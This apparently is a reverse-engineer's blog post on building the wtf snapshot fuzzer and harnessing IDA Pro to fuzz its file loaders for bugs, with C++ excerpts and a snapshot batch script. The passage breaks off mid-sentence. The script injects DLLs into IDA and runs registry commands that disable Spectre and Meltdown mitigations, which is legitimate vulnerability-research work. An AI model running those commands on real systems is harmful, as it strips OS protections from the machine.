Normal view

There are new articles available, click to refresh the page.

Before yesterdayReverse Engineering

Diary of a reverse-engineer
Building a new snapshot fuzzer & fuzzing IDAAxel "0vercl0k" Souchet
15 July 2021 at 15:00

Building a new snapshot fuzzer & fuzzing IDA

Diary of a reverse-engineer

By: Axel "0vercl0k" Souchet

15 July 2021 at 15:00

Introduction

It is January 2020 and it is this time of the year where I try to set goals for myself. I had just come back from spending Christmas with my family in France and felt fairly recharged. It always is an exciting time for me to think and plan for the year ahead; who knows maybe it'll be the year where I get good at computers I thought (spoiler alert: it wasn't).

One thing I had in the back of my mind was to develop my own custom fuzzing tooling. It was the perfect occasion to play with technologies like Windows Hypervisor platform APIs, KVM APIs but also try out what recent versions of C++ had in store. After talking with yrp604, he convinced me to write a tool that could be used to fuzz any Windows targets, user or kernel, application or service, kernel or drivers. He had done some work in this area so he could follow me along and help me out when I ran into problems.

Great, the plan was to develop this Windows snapshot-based fuzzer running the target code into some kind of environment like a VM or an emulator. It would allow the user to instrument the target the way they wanted via breakpoints and would provide basic features that you expect from a modern fuzzer: code coverage, crash detection, general mutator, cross-platform support, fast restore, etc.

Writing a tool is cool but writing a useful tool is even cooler. That's why I needed to come up with a target I could try the fuzzer against while developing it. I thought that IDA would make a good target for several reasons:

It is a complex Windows user-mode application,
It parses a bunch of binary files,
The application is heavy and is slow to start. The snapshot approach could help fuzz it faster than traditionally,
It has a bug bounty.

In this blog post, I will walk you through the birth of what the fuzz, its history, and my overall journey from zero to accomplishing my initial goals. For those that want the results before reading, you can find my findings in this Github repository: fuzzing-ida75.

There is also an excellent blog post that my good friend Markus authored on RET2 Systems' blog documenting how he used wtf to find exploitable memory corruption in a triple-A game: Fuzzing Modern UDP Game Protocols With Snapshot-based Fuzzers.

Table of contents:

Architecture

At this point I had a pretty good idea of what the final product should look like and how a user would use wtf:

The user finds a spot in the target that is close to consuming attacker-controlled data. The Windows kernel debugger is used to break at this location and put the target into the wanted state. When done, the user generates a kernel-crash dump and extracts the CPU state.
The user writes a module to tell wtf how to insert a test case in the target. wtf provides basic features like reading physical and virtual memory ranges, read and write registers, etc. The user also defines exit conditions to tell the fuzzer when to stop executing test cases.
wtf runs the targeted code, tracks code coverage, detects crashes, and tracks dirty memory.
wtf restores the dirty physical memory from the kernel crash dump and resets the CPU state. It generates a new test case, rinse & repeat.

After laying out the plan, I realized that I didn't have code that parsed Windows kernel-crash dump which is essential for wtf. So I wrote kdmp-parser which is a C++ library that parses Windows kernel crash dumps. I wrote it myself because I couldn't find a simple drop-in library available on the shelf. Getting physical memory is not enough because I also needed to dump the CPU state as well as MSRs, etc. Thankfully yrp604 had already hacked up a Windbg Javascript extension to do the work and so I reused it bdump.js.

Once I was able to extract the physical memory & the CPU state I needed an execution environment to run my target. Again, yrp604 was working on bochscpu at the time and so I started there. bochscpu is basically bochs's CPU available from a Rust library with C bindings (yes he kindly made bindings because I didn't want to touch any Rust). It basically is a software CPU that knows how to run intel 64-bit code, knows about segmentation, rings, MSRs, etc. It also doesn't use any of bochs devices so it is much lighter. From the start, I decided that wtf wouldn't handle any devices: no disk, no screen, no mouse, no keyboards, etc.

Bochscpu 101

The first step was to load up the physical memory and configure the CPU of the execution environment. Memory in bochscpu is lazy: you start execution with no physical memory available and bochs invokes a callback of yours to tell you when the guest is accessing physical memory that hasn't been mapped. This is great because:

No need to load an entire dump of memory inside the emulator when it starts,
Only used memory gets mapped making the instance very light in memory usage.

I also need to introduce a few acronyms that I use everywhere:

GPA: Guest physical address. This is a physical address inside the guest. The guest is what is run inside the emulator.
GVA: Guest virtual address. This is guest virtual memory.
HVA: Host virtual address. This is virtual memory inside the host. The host is what runs the execution environment.

To register the callback you need to invoke bochscpu_mem_missing_page. The callback receives the GPA that is being accessed and you can call bochscpu_mem_page_insert to insert an HVA page that backs a GPA into the environment. Yes, all guest physical memory is backed by regular virtual memory that the host allocates. Here is a simple example of what the wtf callback looks like:

void StaticGpaMissingHandler(const uint64_t Gpa) {
  const Gpa_t AlignedGpa = Gpa_t(Gpa).Align();
  BochsHooksDebugPrint("GpaMissingHandler: Mapping GPA {:#x} ({:#x}) ..\n",
                       AlignedGpa, Gpa);

  const void *DmpPage =
      reinterpret_cast<BochscpuBackend_t *>(g_Backend)->GetPhysicalPage(
          AlignedGpa);
  if (DmpPage == nullptr) {
    BochsHooksDebugPrint(
        "GpaMissingHandler: GPA {:#x} is not mapped in the dump.\n",
        AlignedGpa);
  }

  uint8_t *Page = (uint8_t *)aligned_alloc(Page::Size, Page::Size);
  if (Page == nullptr) {
    fmt::print("Failed to allocate memory in GpaMissingHandler.\n");
    __debugbreak();
  }

  if (DmpPage) {

    //
    // Copy the dump page into the new page.
    //

    memcpy(Page, DmpPage, Page::Size);

  } else {

    //
    // Fake it 'till you make it.
    //

    memset(Page, 0, Page::Size);
  }

  //
  // Tell bochscpu that we inserted a page backing the requested GPA.
  //

  bochscpu_mem_page_insert(AlignedGpa.U64(), Page);
}

It is simple:

we allocate a page of memory with aligned_alloc as bochs requires page-aligned memory,
we populate its content using the crash dump.
we assume that if the guest accesses physical memory that isn't in the crash dump, it means that the OS is allocating "new" memory. We fill those pages with zeroes. We also assume that if we are wrong about that, the guest will crash in spectacular ways.

To create a context, you call bochscpu_cpu_new to create a virtual CPU and then bochscpu_cpu_set_state to set its state. This is a shortened version of LoadState:

void BochscpuBackend_t::LoadState(const CpuState_t &State) {
  bochscpu_cpu_state_t Bochs;
  memset(&Bochs, 0, sizeof(Bochs));

  Seed_ = State.Seed;
  Bochs.bochscpu_seed = State.Seed;
  Bochs.rax = State.Rax;
  Bochs.rbx = State.Rbx;
//...
  Bochs.rflags = State.Rflags;
  Bochs.tsc = State.Tsc;
  Bochs.apic_base = State.ApicBase;
  Bochs.sysenter_cs = State.SysenterCs;
  Bochs.sysenter_esp = State.SysenterEsp;
  Bochs.sysenter_eip = State.SysenterEip;
  Bochs.pat = State.Pat;
  Bochs.efer = uint32_t(State.Efer.Flags);
  Bochs.star = State.Star;
  Bochs.lstar = State.Lstar;
  Bochs.cstar = State.Cstar;
  Bochs.sfmask = State.Sfmask;
  Bochs.kernel_gs_base = State.KernelGsBase;
  Bochs.tsc_aux = State.TscAux;
  Bochs.fpcw = State.Fpcw;
  Bochs.fpsw = State.Fpsw;
  Bochs.fptw = State.Fptw;
  Bochs.cr0 = uint32_t(State.Cr0.Flags);
  Bochs.cr2 = State.Cr2;
  Bochs.cr3 = State.Cr3;
  Bochs.cr4 = uint32_t(State.Cr4.Flags);
  Bochs.cr8 = State.Cr8;
  Bochs.xcr0 = State.Xcr0;
  Bochs.dr0 = State.Dr0;
  Bochs.dr1 = State.Dr1;
  Bochs.dr2 = State.Dr2;
  Bochs.dr3 = State.Dr3;
  Bochs.dr6 = State.Dr6;
  Bochs.dr7 = State.Dr7;
  Bochs.mxcsr = State.Mxcsr;
  Bochs.mxcsr_mask = State.MxcsrMask;
  Bochs.fpop = State.Fpop;

#define SEG(_Bochs_, _Whv_)                                                    \
  {                                                                            \
    Bochs._Bochs_.attr = State._Whv_.Attr;                                     \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
    Bochs._Bochs_.present = State._Whv_.Present;                               \
    Bochs._Bochs_.selector = State._Whv_.Selector;                             \
  }

  SEG(es, Es);
  SEG(cs, Cs);
  SEG(ss, Ss);
  SEG(ds, Ds);
  SEG(fs, Fs);
  SEG(gs, Gs);
  SEG(tr, Tr);
  SEG(ldtr, Ldtr);

#undef SEG

#define GLOBALSEG(_Bochs_, _Whv_)                                              \
  {                                                                            \
    Bochs._Bochs_.base = State._Whv_.Base;                                     \
    Bochs._Bochs_.limit = State._Whv_.Limit;                                   \
  }

  GLOBALSEG(gdtr, Gdtr);
  GLOBALSEG(idtr, Idtr);

  // ...
  bochscpu_cpu_set_state(Cpu_, &Bochs);
}

In order to register various hooks, you need a chain of bochscpu_hooks_t structures. For example, wtf registers them like this:

//
// Prepare the hooks.
//

Hooks_.ctx = this;
Hooks_.after_execution = StaticAfterExecutionHook;
Hooks_.before_execution = StaticBeforeExecutionHook;
Hooks_.lin_access = StaticLinAccessHook;
Hooks_.interrupt = StaticInterruptHook;
Hooks_.exception = StaticExceptionHook;
Hooks_.phy_access = StaticPhyAccessHook;
Hooks_.tlb_cntrl = StaticTlbControlHook;

I don't want to describe every hook but we get notified every time an instruction is executed and every time physical or virtual memory is accessed. The hooks are documented in instrumentation.txt if you are curious. As an example, this is the mechanism used to provide full system code coverage:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

  // ...
}

Once the hook chain is configured, you start execution of the guest with bochscpu_cpu_run:

//
// Lift off.
//

bochscpu_cpu_run(Cpu_, HookChain_);

Great, we're now pros and we can run some code!

Building the basics

In this part, I focus on the various fundamental blocks that we need to develop for the fuzzer to work and be useful.

Memory access facilities

As mentioned in the introduction, the user needs to tell the fuzzer how to insert a test case into its target. As a result, the user needs to be able to read & write physical and virtual memory.

Let's start with the easy one. To write into guest physical memory we need to find the backing HVA page. bochscpu uses a dictionary to map GPA to HVA pages that we can query using bochscpu_mem_phy_translate. Keep in mind that two adjacent GPA pages are not necessarily adjacent in the host address space, that is why writing across two pages needs extra care.

Writing to virtual memory is trickier because we need to know the backing GPAs. This means emulating the MMU and parsing the page tables. This gives us GPAs and we know how to write in this space. Same as above, writing across two pages needs extra care.

Instrumenting execution flow

Being able to instrument the target is very important because both the user and wtf itself need this to implement features. For example, crash detection is implemented by wtf using breakpoints in strategic areas. Another example, the user might also need to skip a function call and fake a return value. Implementing breakpoints in an emulator is easy as we receive a notification when an instruction is executed. This is the perfect spot to check if we have a registered breakpoint at this address and invoke a callback if so:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  // ...

  //
  // Handle breakpoints.
  //

  if (Breakpoints_.contains(Rip)) {
    Breakpoints_.at(Rip)(this);
  }
}

Handling infinite loop

To protect the fuzzer against infinite loops, the AfterExecutionHook hook is used to count instructions. This allows us to limit test case execution:

void BochscpuBackend_t::AfterExecutionHook(/*void *Context, */ uint32_t,
                                           void *) {

  //
  // Keep track of the instructions executed.
  //

  RunStats_.NumberInstructionsExecuted++;

  //
  // Check the instruction limit.
  //

  if (InstructionLimit_ > 0 &&
      RunStats_.NumberInstructionsExecuted > InstructionLimit_) {

    //
    // If we're over the limit, we stop the cpu.
    //

    BochsHooksDebugPrint("Over the instruction limit ({}), stopping cpu.\n",
                         InstructionLimit_);
    TestcaseResult_ = Timedout_t();
    bochscpu_cpu_stop(Cpu_);
  }
}

Tracking code coverage

Again, getting full system code coverage with bochscpu is very easy thanks to the hook points. Every time an instruction is executed we add the address into a set:

void BochscpuBackend_t::BeforeExecutionHook(
        /*void *Context, */ uint32_t, void *) {

  //
  // Grab the rip register off the cpu.
  //

  const Gva_t Rip = Gva_t(bochscpu_cpu_rip(Cpu_));

  //
  // Keep track of new code coverage or log into the trace file.
  //

  const auto &Res = AggregatedCodeCoverage_.emplace(Rip);
  if (Res.second) {
    LastNewCoverage_.emplace(Rip);
  }

Tracking dirty memory

wtf tracks dirty memory to be able to restore state fast. Instead of restoring the entire physical memory, we simply restore the memory that has changed since the beginning of the execution. One of the hook points notifies us when the guest accesses memory, so it is easy to know which memory gets written to.

void BochscpuBackend_t::LinAccessHook(/*void *Context, */ uint32_t,
                                      uint64_t VirtualAddress,
                                      uint64_t PhysicalAddress, uintptr_t Len,
                                      uint32_t, uint32_t MemAccess) {

  // ...

  //
  // If this is not a write access, we don't care to go further.
  //

  if (MemAccess != BOCHSCPU_HOOK_MEM_WRITE &&
      MemAccess != BOCHSCPU_HOOK_MEM_RW) {
    return;
  }

  //
  // Adding the physical address the set of dirty GPAs.
  // We don't use DirtyVirtualMemoryRange here as we need to
  // do a GVA->GPA translation which is a bit costly.
  //

  DirtyGpa(Gpa_t(PhysicalAddress));
}

Note that accesses straddling pages aren't handled in this callback because bochs delivers one call per page. Once wtf knows which pages are dirty, restoring is easy:

bool BochscpuBackend_t::Restore(const CpuState_t &CpuState) {
  // ...
  //
  // Restore physical memory.
  //

  uint8_t ZeroPage[Page::Size];
  memset(ZeroPage, 0, sizeof(ZeroPage));
  for (const auto DirtyGpa : DirtyGpas_) {
    const uint8_t *Hva = DmpParser_.GetPhysicalPage(DirtyGpa.U64());

    //
    // As we allocate physical memory pages full of zeros when
    // the guest tries to access a GPA that isn't present in the dump,
    // we need to be able to restore those. It's easy, if the Hva is nullptr,
    // we point it to a zero page.
    //

    if (Hva == nullptr) {
      Hva = ZeroPage;
    }

    bochscpu_mem_phy_write(DirtyGpa.U64(), Hva, Page::Size);
  }

  //
  // Empty the set.
  //

  DirtyGpas_.clear();

  // ...
  return true;
}

Generic mutators

I think generic mutators are great but I didn't want to spend too much time worrying about them. Ultimately I think you get more value out of writing a domain-specific generator and building a diverse high-quality corpus. So I simply ripped off libfuzzer's and honggfuzz's.

class LibfuzzerMutator_t {
  using CustomMutatorFunc_t =
      decltype(fuzzer::ExternalFunctions::LLVMFuzzerCustomMutator);
  fuzzer::Random Rand_;
  fuzzer::MutationDispatcher Mut_;
  std::unique_ptr<fuzzer::Unit> CrossOverWith_;

public:
  explicit LibfuzzerMutator_t(std::mt19937_64 &Rng);

  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void RegisterCustomMutator(const CustomMutatorFunc_t F);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

class HonggfuzzMutator_t {
  honggfuzz::dynfile_t DynFile_;
  honggfuzz::honggfuzz_t Global_;
  std::mt19937_64 &Rng_;
  honggfuzz::run_t Run_;

public:
  explicit HonggfuzzMutator_t(std::mt19937_64 &Rng);
  size_t Mutate(uint8_t *Data, const size_t DataLen, const size_t MaxSize);
  void SetCrossOverWith(const Testcase_t &Testcase);
};

Corpus store

Code coverage in wtf is basically the fitness function. Every test case that generates new code coverage is added to the corpus. The code that keeps track of the corpus is basically a glorified list of test cases that are kept in memory.

The main loop asks for a test case from the corpus which gets mutated by one of the generic mutators and finally runs into one of the execution environments. If the test case generated new coverage it gets added to the corpus store - nothing fancy.

    //
    // If the coverage size has changed, it means that this testcase
    // provided new coverage indeed.
    //

    const bool NewCoverage = Coverage_.size() > SizeBefore;
    if (NewCoverage) {

      //
      // Allocate a test that will get moved into the corpus and maybe
      // saved on disk.
      //

      Testcase_t Testcase((uint8_t *)ReceivedTestcase.data(),
                          ReceivedTestcase.size());

      //
      // Before moving the buffer into the corpus, set up cross over with
      // it.
      //

      Mutator_->SetCrossOverWith(Testcase);

      //
      // Ready to move the buffer into the corpus now.
      //

      Corpus_.SaveTestcase(Result, std::move(Testcase));
    }
  }

  // [...]

  //
  // If we get here, it means that we are ready to mutate.
  // First thing we do is to grab a seed.
  //

  const Testcase_t *Testcase = Corpus_.PickTestcase();
  if (!Testcase) {
    fmt::print("The corpus is empty, exiting\n");
    std::abort();
  }

  //
  // If the testcase is too big, abort as this should not happen.
  //

  if (Testcase->BufferSize_ > Opts_.TestcaseBufferMaxSize) {
    fmt::print(
        "The testcase buffer len is bigger than the testcase buffer max "
        "size.\n");
    std::abort();
  }

  //
  // Copy the input in a buffer we're going to mutate.
  //

  memcpy(ScratchBuffer_.data(), Testcase->Buffer_.get(),
          Testcase->BufferSize_);

  //
  // Mutate in the scratch buffer.
  //

  const size_t TestcaseBufferSize =
      Mutator_->Mutate(ScratchBuffer_.data(), Testcase->BufferSize_,
                        Opts_.TestcaseBufferMaxSize);

  //
  // Copy the testcase in its own buffer before sending it to the
  // consumer.
  //

  TestcaseContent.resize(TestcaseBufferSize);
  memcpy(TestcaseContent.data(), ScratchBuffer_.data(), TestcaseBufferSize);

Detecting context switches

Because we are running an entire OS, we want to avoid spending time executing things that aren't of interest to our purpose. If you are fuzzing ida64.exe you don't really care about executing explorer.exe code. For this reason, we look for cr3 changes thanks to the TlbControlHook callback and stop execution if needed:

void BochscpuBackend_t::TlbControlHook(/*void *Context, */ uint32_t,
                                       uint32_t What, uint64_t NewCrValue) {

  //
  // We only care about CR3 changes.
  //

  if (What != BOCHSCPU_HOOK_TLB_CR3) {
    return;
  }

  //
  // And we only care about it when the CR3 value is actually different from
  // when we started the testcase.
  //

  if (NewCrValue == InitialCr3_) {
    return;
  }

  //
  // Stop the cpu as we don't want to be context-switching.
  //

  BochsHooksDebugPrint("The cr3 register is getting changed ({:#x})\n",
                       NewCrValue);
  BochsHooksDebugPrint("Stopping cpu.\n");
  TestcaseResult_ = Cr3Change_t();
  bochscpu_cpu_stop(Cpu_);
}

Debug symbols

Imagine yourself fuzzing a target with wtf now. You need to write a fuzzer module in order to tell wtf how to feed a testcase to your target. To do that, you might need to read some global states to retrieve some offsets of some critical structures. We've built memory access facilities so you can definitely do that but you have to hardcode addresses. This gets in the way really fast when you are taking different snapshots, porting the fuzzer to a new version of the targeted software, etc.

This was identified early on as a big pain point for the user and I needed a way to not hardcode things that didn't need to be hardcoded. To address this problem, on Windows I use the IDebugClient / IDebugControl COM objects that allow programmatic use of dbghelp and dbgeng features. You can load a crash dump, evaluate and resolve symbols, etc. This is what the Debugger_t class does.

Trace generation

The most annoying thing for me was that execution backends are extremely opaque. It is really hard to see what's going on within them. Actually, if you have ever tried to use whv / kvm APIs you probably ran into the case where the API tells you that you loaded a 'wrong' CPU state. It might be an MSR not configured right, a weird segment descriptor, etc. Figuring out where the issue comes from is both painful and frustrating.

Not knowing what's happening is also annoying when the guest is bug-checking inside the backend. To address the lack of transparency I decided to generate execution traces that I could use for debugging. It is very rudimentary yet very useful to verify that the execution inside the backend is correct. In addition to this tool, you can always modify your module to add strategic breakpoints and dump registers when you want. Those traces are pretty cool because you get to follow everything that happens in the system: from user-mode to kernel-mode, the page-fault handler, etc.

Those traces are also used to be loaded in lighthouse to analyze the coverage generated by a particular test case.

Crash detection

The last basic block that I needed was user-mode crash detection. I had done some past work in the user exception handler so I kind of knew my way around it. I decided to hook ntdll!RtlDispatchException & nt!KiRaiseSecurityCheckFailure to detect fail-fast exceptions that can be triggered from stack cookie check failure.

Harnessing IDA: walking barefoot into the desert

Once I was done writing the basic features, I started to harness IDA. I knew I wanted to target the loader plugins and based on their sizes as well as past vulnerabilities it felt like looking at ELF was my best chance.

I initially started to harness IDA with its GUI and everything. In retrospect, this was bonkers as I remember handling tons of weird things related to Qt and win32k. After a few weeks of making progress here and there I realized that IDA had a few options to make my life easier:

IDA_NO_HISTORY=1 meant that I didn't have to handle as many registry accesses,
The -B option allows running IDA in batch-mode from the command line,
TVHEADLESS=1 also helped a lot regarding GUI/Qt stuff I was working around.

Some of those options were documented later this year by Igor in this blog post: Igor’s tip of the week #08: Batch mode under the hood.

Inserting test case

After finding out those it immediately felt like harnessing was possible again. The main problem I had was that IDA reads the input file lazily via fread, fseek, etc. It also reads a bunch of other things like configuration files, the license file, etc.

To be able to deliver my test cases I implemented a layer of hooks that allowed me to pass through file i/o from the guest to my host. This allowed me to read my IDA license keys, the configuration files as well as my input. It also meant that I could sink file writes made to the .id0, .id1, .nam, and all the files that IDA generates that I didn't care about. This was quite a bit of work and it was not really fun work either.

I was not a big fan of this pass through layer because I was worried that a bug in my code could mean overwriting files on my host or lead to that kind of badness. That is why I decided to replace this pass-through layer by reading from memory buffers. During startup, wtf reads the actual files into buffers and the file-system hooks deliver the bytes as needed. You can see this work in fshooks.cc.

This is an example of what this layer allowed me to do:

bool Ida64ConfigureFsHandleTable(const fs::path &GuestFilesPath) {

  //
  // Those files are files we want to redirect to host files. When there is
  // a hooked i/o targeted to one of them, we deliver the i/o on the host
  // by calling the appropriate syscalls and proxy back the result to the
  // guest.
  //

  const std::vector<std::u16string> GuestFiles = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida.key)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\ida.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\noret.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\pe.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\plugins\plugins.cfg)"};

  for (const auto &GuestFile : GuestFiles) {
    const size_t LastSlash = GuestFile.find_last_of(uR"(\)");
    if (LastSlash == GuestFile.npos) {
      fmt::print("Expected a / in {}\n", u16stringToString(GuestFile));
      return false;
    }

    const std::u16string GuestFilename = GuestFile.substr(LastSlash + 1);
    const fs::path HostFile(GuestFilesPath / GuestFilename);

    size_t BufferSize = 0;
    const auto Buffer = ReadFile(HostFile, BufferSize);
    if (Buffer == nullptr || BufferSize == 0) {
      fmt::print("Expected to find {}.\n", HostFile.string());
      return false;
    }

    g_FsHandleTable.MapExistingGuestFile(GuestFile.c_str(), Buffer.get(),
                                         BufferSize);
  }

  g_FsHandleTable.MapExistingWriteableGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id0)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id1)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.nam)");
  g_FsHandleTable.MapNonExistingGuestFile(
      uR"(\??\C:\Users\over\Desktop\wtf_input.id2)");

  //
  // Those files are files we want to pretend that they don't exist in the
  // guest.
  //

  const std::vector<std::u16string> NotFounds = {
      uR"(\??\C:\Program Files\IDA Pro 7.5\ida64.int)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\idsnames)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc6.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\epoc9.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\flirt.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\geos.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\linux.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\os2.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\win7.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\wince.zip)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\loaders\hppacore.idc)",
      uR"(\??\C:\Users\over\AppData\Roaming\Hex-Rays\IDA Pro\proccache64.lst)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\Latin_1.clt)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\dwarf.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\ids\)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\atrap.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\hpux.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\i960.cfg)",
      uR"(\??\C:\Program Files\IDA Pro 7.5\cfg\goodname.cfg)"};

  for (const std::u16string &NotFound : NotFounds) {
    g_FsHandleTable.MapNonExistingGuestFile(NotFound.c_str());
  }

  g_FsHandleTable.SetBlacklistDecisionHandler([](const std::u16string &Path) {
    // \ids\pc\api-ms-win-core-profile-l1-1-0.idt
    // \ids\api-ms-win-core-profile-l1-1-0.idt
    // \sig\pc\vc64seh.sig
    // \til\pc\gnulnx_x64.til
    // 6ba8075c8f243566350f741c7d6e9318089add.debug
    const bool IsIdt = Path.ends_with(u".idt");
    const bool IsIds = Path.ends_with(u".ids");
    const bool IsSig = Path.ends_with(u".sig");
    const bool IsTil = Path.ends_with(u".til");
    const bool IsDebug = Path.ends_with(u".debug");
    const bool Blacklisted = IsIdt || IsIds || IsSig || IsTil || IsDebug;

    if (Blacklisted) {
      return true;
    }

    //
    // The parser can invoke ida64!import_module to have the user select
    // a file that gets imported by the binary currently analyzed. This is
    // fine if the import directory is well formated, when it's not it
    // potentially uses garbage in the file as a path name. Strategy here
    // is to block the access if the path is not ASCII.
    //

    for (const auto &C : Path) {
      if (isascii(C)) {
        continue;
      }

      DebugPrint("Blocking a weird NtOpenFile: {}\n", u16stringToString(Path));
      return true;
    }

    return false;
  });

  return true;
}

Although this was probably the most annoying problem to deal with, I had to deal with tons more. I've decided to walk you through some of them.

Problem 1: Pre-load dlls

For IDA to know which loader is the right loader to use it loads all of them and asks them if they know what this file is. Remember that there is no disk when running in wtf so loading a DLL is a problem.

This problem was solved by injecting the DLLs with inject into IDA before generating the snapshot so that when it loads them it doesn't generate file i/o. The same problem happens with delay-loaded DLLs.

Problem 2: Paged-out memory

On Windows, memory can be swapped out and written to disk into the pagefile.sys file. When somebody accesses memory that has been paged out, the access triggers a #PF which the page fault handler resolves by loading the page back up from the pagefile. But again, this generates file i/o.

I solved this problem for user-mode with lockmem which is a small utility that locks all virtual memory ranges into the process working set. As an example, this is the script I used to snapshot IDA and it highlights how I used both inject and lockmem:

set BASE_DIR=C:\Program Files\IDA Pro 7.5
set PLUGINS_DIR=%BASE_DIR%\plugins
set LOADERS_DIR=%BASE_DIR%\loaders
set PROCS_DIR=%BASE_DIR%\procs
set NTSD=C:\Users\over\Desktop\x64\ntsd.exe

REM Remove a bunch of plugins
del "%PLUGINS_DIR%\python.dll"
del "%PLUGINS_DIR%\python64.dll"
[...]
REM Turning on PH
REM 02000000 Enable page heap (full page heap)
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "GlobalFlag" /t REG_SZ /d "0x2000000" /f
REM This is useful to disable stack-traces
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe" /v "PageHeapFlags" /t REG_SZ /d "0x0" /f

REM History is stored in the registry and so triggers cr3 change (when attaching to Registry process VA)
set IDA_NO_HISTORY=1
REM Set up headless mode and run IDA
set TVHEADLESS=1
REM https://www.hex-rays.com/products/ida/support/idadoc/417.shtml
start /b %NTSD% -d "%BASE_DIR%\ida64.exe" -B wtf_input

REM bp ida64!init_database
REM Bump suspend count: ~0n
REM Detach: qd
REM Find process, set ba e1 on address from kdbg
REM ntsd -pn ida64.exe ; fix suspend count: ~0m
REM should break.

REM Inject the dlls.
inject.exe ida64.exe "%PLUGINS_DIR%"
inject.exe ida64.exe "%LOADERS_DIR%"
inject.exe ida64.exe "%PROCS_DIR%"
inject.exe ida64.exe "%BASE_DIR%\libdwarf.dll"

REM Lock everything
lockmem.exe ida64.exe

REM You can now reattach; and ~0m to bump down the suspend count
%NTSD% -pn ida64.exe

Problem 3: Manually soft page-fault in memory from hooks

To insert my test cases in memory I used the file system hook layer I described above as well as virtual memory facilities that we talked about earlier. Sometimes, the caller would allocate a memory buffer and call let's say fread to read the file into the buffer. When fread was invoked, my hook triggered, and sometimes calling VirtWrite would fail. After debugging and inspecting the state of the PTEs it was clear that the PTE was in an invalid state. This is explained because memory is lazy on Windows. The page fault is expected to be invoked and it will fix the PTE itself and execution carries. Because we are doing the memory write ourselves, it means that we don't generate a page fault and so the page fault handler doesn't get invoked.

To solve this, I try to do a virtual to physical translation and inspect the result. If the translation is successful it means the page tables are in a good state and I can perform the memory access. If it is not, I insert a page fault in the guest and resume execution. When execution restarts, the page fault handler runs, fixes the PTE, and returns execution to the instruction that was executing before the page fault. Because we have our hook there, we get reinvoked a second time but this time the virtual to physical translation works and we can do the memory write. Here is an example in ntdll!NtQueryAttributesFile:

if (!g_Backend->SetBreakpoint(
        "ntdll!NtQueryAttributesFile", [](Backend_t *Backend) {
          // NTSTATUS NtQueryAttributesFile(
          //  _In_  POBJECT_ATTRIBUTES      ObjectAttributes,
          //  _Out_ PFILE_BASIC_INFORMATION FileInformation
          //);
          // ...
          //
          // Ensure that the GuestFileInformation is faulted-in memory.
          //

          if (GuestFileInformation &&
              Backend->PageFaultsMemoryIfNeeded(
                  GuestFileInformation, sizeof(FILE_BASIC_INFORMATION))) {
            return;
          }

Problem 4: KVA shadow

When I snapshot IDA the CPU is in user-mode but some of the breakpoints I set up are on functions living in kernel-mode. To be able to set a breakpoint on those, wtf simply does a VirtTranslate and modifies physical memory with an int3 opcode. This is exactly what KVA Shadow prevents: the user @cr3 doesn't contain the part of the page tables that describe kernel-mode (only a few stubs) and so there is no valid translation.

To solve this I simply disabled KVA shadow with the below edits in the registry:

REM To disable mitigations for CVE-2017-5715 (Spectre Variant 2) and CVE-2017-5754 (Meltdown)
REM https://support.microsoft.com/en-us/help/4072698/windows-server-speculative-execution-side-channel-vulnerabilities
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f

Problem 5: Identifying bottlenecks

While developing wtf I allocated time to spend on profiling the tool under specific workload with the Intel V-Tune Profiler which is now free. If you have never used it, you really should as it is both absolutely fascinating and really useful. If you care about performance, you need to measure to understand better where you can have the most impact. Not measuring is a big mistake because you will most likely spend time changing code that might not even matter. If you try to optimize something you should also be able to measure the impact of your change.

For example, below is the V-Tune hotspot analysis report for the below invocation:

